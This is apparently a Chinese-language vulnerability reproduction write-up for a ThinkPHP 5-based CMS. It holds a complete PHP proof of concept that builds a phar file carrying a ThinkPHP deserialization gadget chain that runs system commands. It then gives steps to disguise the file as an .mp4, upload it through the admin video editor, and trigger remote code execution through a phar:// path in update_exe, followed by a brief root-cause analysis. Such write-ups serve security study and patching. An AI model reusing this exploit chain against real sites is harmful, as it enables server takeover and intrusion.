环境搭建
下载源码:http://down.chinaz.com/soft/39542.htm
创建数据库,导入sql
data:image/s3,"s3://crabby-images/448b3/448b30659df68890dc454b9e83124868a1624021" alt="hGIf56.png"
/config/database.php
修改数据库连接信息
data:image/s3,"s3://crabby-images/5a178/5a1780586bc2661dcb854c325ec1a56a3a459e9d" alt="hGI4PK.png"
安装成功
data:image/s3,"s3://crabby-images/3f40a/3f40a3905dac6b0584f94cf84e60ddb917b79c9b" alt="hGII2D.png"
漏洞复现
poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
| <?php namespace think{ abstract class Model{ private $withAttr = []; private $data = []; public function __construct() { $this->withAttr=['a'=>'system']; $this->data=['a'=>'whoami']; } }
} namespace think\model{ use think\Model; class Pivot extends Model{
} } namespace think\process\pipes { use \think\Model\Pivot; use think\Process; abstract class Pipes {
}
class Windows extends Pipes { private $files = []; public function __construct() { $this->files=[new Pivot()]; } } }
namespace { $phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$a = new think\process\pipes\Windows();
$phar->setMetadata($a); $phar->addFromString("exp.txt", "test");
$phar->stopBuffering(); } ?>
|
运行poc生成phar.phar文件,然后把后缀名改为mp4
data:image/s3,"s3://crabby-images/ea521/ea5213f2670f21a82216015c63154a5af436665b" alt="hGIbqA.png"
登录后台,在编辑文章内容中上传视频文件
data:image/s3,"s3://crabby-images/22174/221745f15527f4e5fe05f2125a3d693ff80eaeb9" alt="hGIoxe.png"
上传phar.mp4文件
data:image/s3,"s3://crabby-images/4b7e7/4b7e74d035259e9dc5ba74a6ebec73246d957628" alt="hGI7KH.png"
点击上传视频的按钮得到回显地址
data:image/s3,"s3://crabby-images/73d2f/73d2f59e54deb24e65c0b788027e01c82be4bc22" alt="hGIHrd.png"
利用phar触发反序列化,成功执行命令
1
| http://localhost/admin.php?s=/update/update_exe?upath=phar://./uploads/video/20210816/7512b9eb69b9a05a6fb461835f86630a.mp4
|
data:image/s3,"s3://crabby-images/95ce7/95ce77b2fed581d04016518d234d48d22e5571ba" alt="hGILVI.png"
漏洞分析
/application/admin/controller/Update.php
update_exe将可控参数$upath传入opendir,可触发phar反序列化,配合thinkphp5反序列化利用链即可实现RCE。
data:image/s3,"s3://crabby-images/d2b3c/d2b3ccd61a5de19f411d5e2c2541e173ef71b792" alt="hGI58O.png"